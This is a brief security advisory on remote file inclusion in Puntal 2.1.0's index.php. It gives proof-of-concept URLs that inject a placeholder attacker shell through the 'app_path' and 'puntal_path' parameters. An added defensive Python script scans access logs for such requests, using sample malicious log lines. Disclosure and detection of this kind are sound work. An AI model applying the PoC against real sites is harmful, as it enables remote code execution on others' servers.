
Puntal (index.php) Remote File Inclusion Vulnerabilities






Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially crafted URL request to the "index.php" script, using the "app_path" or "puntal_path" parameter to specify a malicious PHP file on a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.

Puntal 2.1.0 is vulnerable; other versions may also be affected.

An attacker can exploit these issues via a browser.

-=[P0C]=-

http://127.0.0.1//path/index.php?app_path=[inj3ct0r sh3ll]
            or
http://127.0.0.1//path/index.php?puntal_path=[inj3ct0r sh3ll]
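
For defenders, an added example (not part of the original advisory and not Puntal code) that scans web server access logs for requests to index.php in which "app_path" or "puntal_path" carries a remote URL, including percent-encoded forms. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters named in the advisory.
SUSPECT_PARAMS = {"app_path", "puntal_path"}
# A value that starts with a URL scheme (http://, ftp://, ...) or with "//host".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252F -> %2F -> /)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_inclusion_attempts(log_lines):
    """Return (line_number, parameter, decoded_value) for suspicious requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/index.php"):
            continue
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = fully_decode(raw)
            if name.lower() in SUSPECT_PARAMS and REMOTE_VALUE.match(value):
                hits.append((number, name.lower(), value))
    return hits


# Constructed sample log lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /path/index.php?page=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /path/index.php?app_path=http://files.example.net/x.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /path/index.php?puntal_path=ftp%253A%252F%252Ffiles.example.net%252Fx HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /path/index.php?app_path=./app/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected; parameters sent in a request body do not appear in access logs and need a check at the application or a filtering proxy.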

